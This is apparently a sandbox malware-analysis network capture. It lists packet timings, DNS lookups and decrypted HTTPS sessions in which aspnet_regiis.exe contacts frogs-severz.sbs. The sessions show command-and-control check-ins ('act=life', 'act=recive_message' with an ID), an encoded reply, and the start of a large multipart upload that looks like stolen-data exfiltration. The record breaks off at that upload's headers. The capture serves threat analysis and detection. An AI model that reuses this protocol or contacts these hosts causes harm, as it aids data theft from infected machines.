                                                                      Nov 23, 2024 15:22:08.099419117 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:08.099436045 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.099828005 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.109860897 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:08.111732006 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:08.111745119 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.867507935 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.867774963 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.867944002 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:08.869630098 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:08.869659901 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:09.376770973 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:09.376826048 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:09.376924992 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:09.377247095 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:09.377278090 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.655550957 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.655733109 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.657171965 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.657203913 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.657968044 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.659348011 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.660193920 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.660243988 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.660623074 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.660667896 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.660825968 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.660881996 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661036968 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.661089897 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661273003 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.661326885 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661529064 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.661571980 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661590099 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.661618948 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661856890 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.661896944 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.661940098 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.662044048 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.662079096 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.707328081 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.707617998 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.707660913 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.707710028 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.707753897 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:10.707858086 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:10.707901001 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:13.266586065 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:13.266829967 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:13.266891956 CET49717443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:13.266932011 CET44349717172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:13.290101051 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:13.290143013 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:13.290205956 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:13.290600061 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:13.290616035 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:14.602911949 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:14.603008986 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:14.608639002 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:14.608659983 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:14.608973980 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:14.610364914 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:14.610423088 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:14.610447884 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:15.336500883 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:15.336740971 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:15.337622881 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:15.338644028 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:15.338665009 CET44349722172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:15.338674068 CET49722443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:15.338680029 CET44349722172.67.155.47192.168.2.5
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 15:21:54.891585112 CET5839653192.168.2.51.1.1.1
                                                                      Nov 23, 2024 15:21:55.133311987 CET53583961.1.1.1192.168.2.5
                                                                      Nov 23, 2024 15:21:55.140150070 CET5316353192.168.2.51.1.1.1
                                                                      Nov 23, 2024 15:21:55.387480974 CET53531631.1.1.1192.168.2.5
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 15:21:54.891585112 CET192.168.2.51.1.1.10xe702Standard query (0)fumblingactor.cyouA (IP address)IN (0x0001)false
                                                                      Nov 23, 2024 15:21:55.140150070 CET192.168.2.51.1.1.10x4fcdStandard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 15:21:55.133311987 CET1.1.1.1192.168.2.50xe702Name error (3)fumblingactor.cyounonenoneA (IP address)IN (0x0001)false
                                                                      Nov 23, 2024 15:21:55.387480974 CET1.1.1.1192.168.2.50x4fcdNo error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
                                                                      Nov 23, 2024 15:21:55.387480974 CET1.1.1.1192.168.2.50x4fcdNo error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                      • frogs-severz.sbs
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549704172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:21:56 UTC263OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:21:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-11-23 14:21:57 UTC1015INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:21:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=gc25urgcck4bqr5pr89db843cl; expires=Wed, 19-Mar-2025 08:08:36 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3aa2JQ%2B5ITT1nUjruSPaKi6hGgqDXccksoeck2SQUV30RAy5SKbLWmcGW2kIZ%2Ft%2F1Jlso4JU%2BxyR7gI7foZdMz%2B3iQK%2BqXp7K6YuVc8gFX%2FzzbgCT8QXw9ONEEVzZptRMz5"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71ceff6acfc335-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1491&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1918528&cwnd=163&unsent_bytes=0&cid=71272dcd92b44079&ts=916&x=0"
                                                                      2024-11-23 14:21:57 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-11-23 14:21:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549706172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:21:58 UTC264OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 54
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:21:58 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--jqmircmzqpgf&j=
                                                                      2024-11-23 14:21:59 UTC1007INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:21:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=rga4pcsp971cfaothn8q00btlu; expires=Wed, 19-Mar-2025 08:08:38 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZpif26WRXpi5C1LGOkTn6VRkB7UOSfjigCyQHs%2BIjxsaHUsa1F4EFyLBCUxYfYxI1M2evoKNm8%2FCfqgSVbfqFvyvI1yA2HAYAs4V%2B3SmdoAFQ18EMWDZkLK7VQqMHPlTt1W"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf0d4f0f4249-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1842&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=954&delivery_rate=1536842&cwnd=225&unsent_bytes=0&cid=f26015627cd371ff&ts=735&x=0"
                                                                      2024-11-23 14:21:59 UTC362INData Raw: 34 65 35 0d 0a 7a 38 65 6d 58 59 39 74 56 42 6d 68 49 66 4e 6a 6d 6d 49 33 79 49 70 56 7a 4b 32 6d 33 53 67 55 4a 70 62 4a 73 4a 2b 48 7a 4d 79 30 35 64 42 2f 74 56 6c 34 4f 39 4a 45 30 56 6e 75 45 45 4b 74 70 6e 65 74 79 59 54 6e 54 6e 56 4b 35 61 79 63 76 66 47 68 37 76 57 68 78 7a 48 38 43 48 67 37 78 46 6e 52 57 63 45 5a 46 61 33 6b 64 2f 61 50 77 37 64 4b 64 55 72 30 71 4e 76 77 39 36 43 76 70 36 76 42 4e 65 6f 4f 4d 48 6a 4e 54 4a 59 47 2f 77 4e 64 70 75 4d 34 70 4d 43 45 38 51 70 78 58 4c 54 7a 6b 74 4c 69 75 4b 32 43 70 74 55 32 72 52 42 34 59 6f 4e 45 6e 55 47 67 51 46 61 74 36 44 6d 71 79 63 32 31 51 48 78 43 39 61 33 61 37 2b 36 71 70 4b 65 6c 77 6a 54 67 42 79 52 31 78 30 75 64 41 50 55 44 46 65 53 6f 4d 4c 61 50 6e 50 38 5a 52 45 66 6c 75 73
                                                                      Data Ascii: 4e5z8emXY9tVBmhIfNjmmI3yIpVzK2m3SgUJpbJsJ+HzMy05dB/tVl4O9JE0VnuEEKtpnetyYTnTnVK5aycvfGh7vWhxzH8CHg7xFnRWcEZFa3kd/aPw7dKdUr0qNvw96Cvp6vBNeoOMHjNTJYG/wNdpuM4pMCE8QpxXLTzktLiuK2CptU2rRB4YoNEnUGgQFat6Dmqyc21QHxC9a3a7+6qpKelwjTgByR1x0udAPUDFeSoMLaPnP8ZREflus
                                                                      2024-11-23 14:21:59 UTC898INData Raw: 4f 6f 4c 58 4b 66 6c 4e 36 50 46 79 37 78 4b 63 55 37 2b 70 4e 6a 35 36 4b 4f 6f 72 61 57 45 63 61 30 49 4c 6a 75 62 41 37 49 45 36 41 64 5a 76 4b 6f 4e 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 58 67 72 61 32 6d 71 73 63 33 35 68 30 32 61 63 56 4f 6c 42 50 2b 42 56 75 67 36 79 57 6b 77 63 4b 38 51 33 31 4e 38 61 7a 57 76 61 76 75 71 62 58 6c 6e 48 2f 4d 41 6a 31 33 79 56 53 52 51 65 64 4f 54 4f 72 76 4f 2b 36 58 68 4c 74 4c 63 6b 58 77 70 64 7a 35 36 61 69 67 6f 4b 72 43 4e 65 30 49 50 48 50 4c 51 70 77 4b 39 77 42 51 70 2b 77 78 6f 73 37 42 2f 77 51 32 51 2b 7a 72 69 72 33 4c 71 61 32 2f 35 2f 45 38 34 77 45 78 62 59 4e 63 33 78 69 34 42 31 6e 71 73 48 65 67 79 73 75 74 53 32 52 42 2b 72 6e 65 2b 4f 4f 6a 72 61 4f 6c 77 54 6a 67 41 54 42 38 77 45 75 56
                                                                      Data Ascii: OoLXKflN6PFy7xKcU7+pNj56KOoraWEca0ILjubA7IE6AdZvKoN7tCKpgpxSLTzkvXgra2mqsc35h02acVOlBP+BVug6yWkwcK8Q31N8azWvavuqbXlnH/MAj13yVSRQedOTOrvO+6XhLtLckXwpdz56aigoKrCNe0IPHPLQpwK9wBQp+wxos7B/wQ2Q+zrir3Lqa2/5/E84wExbYNc3xi4B1nqsHegysutS2RB+rne+OOjraOlwTjgATB8wEuV
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 33 66 38 37 0d 0a 2f 51 4f 52 36 66 69 4d 71 44 44 77 62 42 4b 64 30 58 36 6f 64 6d 39 71 2b 36 70 74 65 57 63 66 38 49 43 4a 6d 6e 4a 53 49 42 44 7a 51 4e 62 70 4f 38 68 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 62 6a 6f 71 4b 74 6f 39 59 78 34 68 30 38 61 63 64 4e 6c 51 33 32 43 56 69 6c 37 53 57 71 7a 39 61 2b 54 33 46 4b 2b 62 6e 58 76 61 76 75 71 62 58 6c 6e 48 2f 58 4f 7a 46 72 30 6b 54 54 4e 50 73 4f 57 36 33 2b 64 37 47 42 33 66 39 4e 65 67 53 73 36 39 48 78 36 4b 65 72 6f 72 66 4f 4d 2b 77 64 4d 58 4c 4b 53 5a 41 50 39 77 74 5a 72 2f 6f 38 6f 63 66 4c 76 6b 64 37 54 2f 43 72 6b 72 4f 6c 71 62 62 74 2f 59 51 65 34 41 41 6b 65 4e 49 42 70 41 4c 32 44 6c 4b 38 71 43 6a 67 31 6f 53 34 52 6a 59 63 74 4b 72 65 38 65 53 68 71 4b 65 74 78 7a 37 2f 42 6a
                                                                      Data Ascii: 3f87/QOR6fiMqDDwbBKd0X6odm9q+6pteWcf8ICJmnJSIBDzQNbpO8h7tCKpgpxSLTzkvbjoqKto9Yx4h08acdNlQ32CVil7SWqz9a+T3FK+bnXvavuqbXlnH/XOzFr0kTTNPsOW63+d7GB3f9NegSs69Hx6KerorfOM+wdMXLKSZAP9wtZr/o8ocfLvkd7T/CrkrOlqbbt/YQe4AAkeNIBpAL2DlK8qCjg1oS4RjYctKre8eShqKetxz7/Bj
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 6e 77 2f 78 44 46 32 6d 37 79 57 6a 79 73 79 31 51 33 4e 49 2b 61 6a 41 2f 75 54 75 34 4f 32 69 33 48 2b 31 54 78 46 49 39 47 44 52 48 72 59 5a 46 61 33 6b 64 2f 61 50 78 62 64 4e 65 45 44 6d 70 63 44 7a 34 71 36 6f 70 61 33 44 4d 2b 4d 42 4a 48 50 43 51 35 38 4f 38 41 6c 52 71 2b 77 7a 6f 73 69 45 38 51 70 78 58 4c 54 7a 6b 74 58 6d 74 4c 54 76 69 38 38 2f 36 68 38 67 59 49 4e 63 33 78 69 34 42 31 6e 71 73 48 65 71 78 4d 36 32 53 58 39 41 2b 61 76 62 38 75 79 6d 6f 36 57 33 78 54 58 2f 43 7a 4e 36 7a 45 6d 56 43 66 51 50 57 61 37 36 50 4f 36 42 68 4c 68 53 4e 68 79 30 69 39 6e 72 78 72 79 38 37 62 71 4b 4a 71 30 49 4f 6a 75 62 41 35 67 4e 2b 51 46 66 72 4f 4d 79 6f 38 2f 42 74 55 31 36 52 50 53 6f 31 50 76 6f 70 71 61 68 71 63 63 79 36 41 73 6b 61 63 64
                                                                      Data Ascii: nw/xDF2m7yWjysy1Q3NI+ajA/uTu4O2i3H+1TxFI9GDRHrYZFa3kd/aPxbdNeEDmpcDz4q6opa3DM+MBJHPCQ58O8AlRq+wzosiE8QpxXLTzktXmtLTvi88/6h8gYINc3xi4B1nqsHeqxM62SX9A+avb8uymo6W3xTX/CzN6zEmVCfQPWa76PO6BhLhSNhy0i9nrxry87bqKJq0IOjubA5gN+QFfrOMyo8/BtU16RPSo1Pvopqahqccy6Askacd
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 41 30 56 35 4b 67 77 74 6f 2b 63 2f 32 31 73 53 66 4b 38 77 38 6a 69 72 76 2f 74 75 6f 6f 6d 72 51 67 36 4f 35 73 44 6e 41 33 79 44 56 43 75 34 44 43 74 7a 73 69 37 52 33 74 41 2f 61 2f 58 37 2f 65 6f 6f 4b 32 71 79 6a 44 68 48 54 68 2b 77 30 2f 52 54 37 67 48 54 65 71 77 64 35 2f 59 78 50 39 56 4f 46 32 30 72 4e 36 39 76 65 36 68 6f 4c 66 49 4d 4f 30 4f 4e 58 2f 49 52 4a 63 48 2b 51 4e 51 71 65 30 78 72 38 2f 49 74 55 31 2b 54 76 71 6d 31 50 6e 6a 71 4f 37 6a 35 63 4d 6e 72 56 64 32 53 63 35 4e 6d 41 4c 2b 44 55 4f 43 32 58 65 78 67 64 33 2f 54 58 6f 45 72 4f 76 57 39 75 32 69 71 36 57 67 78 54 66 6e 42 7a 6c 30 30 55 4b 65 43 50 38 4c 57 4b 58 6d 4d 71 44 64 77 37 52 42 66 6b 33 36 72 5a 4b 7a 70 61 6d 32 37 66 32 45 43 65 34 42 50 57 72 4d 51 4a 31 42
                                                                      Data Ascii: A0V5Kgwto+c/21sSfK8w8jirv/tuoomrQg6O5sDnA3yDVCu4DCtzsi7R3tA/a/X7/eooK2qyjDhHTh+w0/RT7gHTeqwd5/YxP9VOF20rN69ve6hoLfIMO0ONX/IRJcH+QNQqe0xr8/ItU1+Tvqm1PnjqO7j5cMnrVd2Sc5NmAL+DUOC2Xexgd3/TXoErOvW9u2iq6WgxTfnBzl00UKeCP8LWKXmMqDdw7RBfk36rZKzpam27f2ECe4BPWrMQJ1B
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 53 6f 4d 4c 61 50 6e 50 39 37 59 45 50 7a 70 4a 44 55 34 72 57 76 70 36 62 50 4d 36 30 51 65 47 4b 44 52 4a 31 42 6f 45 42 59 70 75 55 7a 76 4d 50 45 76 30 4e 78 54 75 61 6b 33 66 44 6d 72 71 75 2f 70 4e 59 77 35 67 6f 31 66 38 78 4d 6e 51 6e 79 51 42 76 71 37 79 2f 75 6c 34 53 54 53 57 64 4f 74 6f 7a 49 36 2b 4b 69 76 36 61 6f 79 48 2f 79 51 53 38 37 78 45 2f 52 57 62 67 41 56 4b 66 36 4d 71 2f 46 7a 72 4a 43 65 55 48 78 70 4e 62 35 37 71 43 38 6f 36 72 45 4f 65 59 4f 4d 33 6a 49 53 5a 38 49 36 6b 41 62 36 75 38 76 37 70 65 45 6c 56 46 33 53 66 6a 70 2f 50 62 7a 71 65 79 4d 71 38 38 34 34 52 6c 32 5a 49 31 61 30 51 62 30 51 41 33 71 34 54 6d 69 7a 4d 4f 33 51 6e 4e 45 2f 36 76 64 39 2b 75 70 76 4b 65 70 7a 69 33 69 44 44 74 2f 7a 6b 6d 55 43 4f 6f 46 58
                                                                      Data Ascii: SoMLaPnP97YEPzpJDU4rWvp6bPM60QeGKDRJ1BoEBYpuUzvMPEv0NxTuak3fDmrqu/pNYw5go1f8xMnQnyQBvq7y/ul4STSWdOtozI6+Kiv6aoyH/yQS87xE/RWbgAVKf6Mq/FzrJCeUHxpNb57qC8o6rEOeYOM3jISZ8I6kAb6u8v7peElVF3Sfjp/PbzqeyMq8844Rl2ZI1a0Qb0QA3q4TmizMO3QnNE/6vd9+upvKepzi3iDDt/zkmUCOoFX
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 75 79 38 69 38 54 58 68 4c 2b 61 54 56 39 75 71 6b 6f 4c 2b 71 77 54 66 68 42 7a 74 70 79 55 6d 44 43 50 45 4e 57 36 4c 36 4e 4f 36 42 68 4c 68 53 4e 68 79 30 6d 64 6a 2b 36 62 69 6a 6f 75 58 62 63 66 52 50 4d 58 65 44 47 39 45 54 36 67 42 65 71 75 38 35 76 4d 37 4d 73 45 42 32 51 76 2b 68 30 66 54 68 6f 4b 65 72 70 4d 6b 2b 37 41 38 7a 65 38 70 52 6e 45 47 32 51 46 4b 79 71 47 2f 75 2b 4d 69 30 65 33 56 53 74 4c 53 63 35 4b 57 70 6f 75 33 39 68 44 37 2f 41 6a 35 2f 77 30 36 58 43 76 6b 42 56 71 72 6f 4e 4b 37 4b 7a 37 42 4d 63 55 6e 2b 6f 74 76 76 37 61 71 38 72 61 6e 41 66 36 4e 50 4d 57 4f 44 47 39 45 78 2b 77 74 5a 71 75 55 69 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 58 75 70 61 69 6d 70 73 63 78 35 67 55 35 64 4d 6c 46 6c 77 6e 39 41 46 6d 71 37 54
                                                                      Data Ascii: uy8i8TXhL+aTV9uqkoL+qwTfhBztpyUmDCPENW6L6NO6BhLhSNhy0mdj+6bijouXbcfRPMXeDG9ET6gBequ85vM7MsEB2Qv+h0fThoKerpMk+7A8ze8pRnEG2QFKyqG/u+Mi0e3VStLSc5KWpou39hD7/Aj5/w06XCvkBVqroNK7Kz7BMcUn+otvv7aq8ranAf6NPMWODG9Ex+wtZquUi7tCKpgpxSLTzkvXupaimpscx5gU5dMlFlwn9AFmq7T
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 75 41 6f 34 42 50 4c 72 69 71 32 72 37 71 71 38 35 5a 78 76 76 31 52 6a 4b 4a 51 54 77 78 36 32 47 52 57 38 71 47 2f 38 67 59 53 74 43 69 34 45 73 36 6a 41 37 2b 4f 74 75 4b 37 69 2b 67 48 4e 42 44 70 34 7a 30 4b 57 51 62 5a 41 57 75 71 77 44 75 37 4d 31 71 30 46 5a 31 4c 35 75 39 57 78 37 62 2b 6a 6f 65 57 4b 66 36 45 4c 50 58 66 47 52 49 46 4f 36 68 42 65 70 76 35 37 71 74 32 45 38 51 70 6e 54 2f 75 35 33 50 71 71 76 37 69 67 74 63 63 36 36 6b 4d 2b 61 73 35 50 30 55 2b 34 46 56 36 6d 37 6a 71 37 67 4e 57 70 53 57 42 44 75 4b 50 44 38 4f 6e 75 6b 65 50 6c 33 48 2b 31 54 77 4e 34 7a 55 32 57 46 2b 6c 4e 64 61 48 6b 4e 4b 4c 4f 77 2f 38 45 4e 6b 4b 30 38 34 47 7a 70 61 71 2f 37 66 32 55 62 62 5a 61 5a 53 79 54 45 59 35 50 34 55 42 44 36 72 42 6c 34 49 2f
                                                                      Data Ascii: uAo4BPLriq2r7qq85Zxvv1RjKJQTwx62GRW8qG/8gYStCi4Es6jA7+OtuK7i+gHNBDp4z0KWQbZAWuqwDu7M1q0FZ1L5u9Wx7b+joeWKf6ELPXfGRIFO6hBepv57qt2E8QpnT/u53Pqqv7igtcc66kM+as5P0U+4FV6m7jq7gNWpSWBDuKPD8OnukePl3H+1TwN4zU2WF+lNdaHkNKLOw/8ENkK084Gzpaq/7f2UbbZaZSyTEY5P4UBD6rBl4I/
                                                                      2024-11-23 14:21:59 UTC1369INData Raw: 67 53 7a 70 64 2f 38 35 71 43 74 76 37 66 43 50 50 73 4d 63 55 58 39 5a 70 77 4d 2f 51 35 53 6c 4e 59 57 70 4e 2f 4a 73 45 31 49 65 73 4f 36 31 65 32 6e 69 4b 32 37 70 6f 52 78 72 52 64 32 49 34 4e 69 6d 78 48 31 44 31 4c 71 70 6e 65 71 6a 35 7a 2f 62 33 74 4a 38 61 58 56 76 38 53 6b 76 71 43 71 77 33 2b 6a 54 7a 6f 37 6d 77 4f 51 43 2b 67 4e 57 71 32 6b 4d 4c 54 49 68 50 45 4b 65 41 53 73 36 39 50 33 39 61 4f 68 71 75 6e 43 4d 65 4e 50 4b 54 58 61 41 34 64 42 6f 46 4d 62 36 76 70 33 39 6f 2b 44 73 55 64 33 52 2f 71 6f 77 4f 2f 6a 72 62 69 75 34 76 6f 42 79 41 49 37 66 73 31 45 72 7a 2f 5a 43 6b 57 6e 35 7a 44 73 37 38 4f 70 53 55 68 36 77 37 72 56 37 61 65 49 72 62 75 6d 68 48 47 74 46 33 59 6a 67 32 4b 62 45 66 55 50 55 75 6a 49 4d 4c 6a 4d 68 50 45 4b
                                                                      Data Ascii: gSzpd/85qCtv7fCPPsMcUX9ZpwM/Q5SlNYWpN/JsE1IesO61e2niK27poRxrRd2I4NimxH1D1Lqpneqj5z/b3tJ8aXVv8SkvqCqw3+jTzo7mwOQC+gNWq2kMLTIhPEKeASs69P39aOhqunCMeNPKTXaA4dBoFMb6vp39o+DsUd3R/qowO/jrbiu4voByAI7fs1Erz/ZCkWn5zDs78OpSUh6w7rV7aeIrbumhHGtF3Yjg2KbEfUPUujIMLjMhPEK


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.549708172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:01 UTC280OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=54TU150KE0PVRYIQ
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12830
                                                                      Host: frogs-severz.sbs
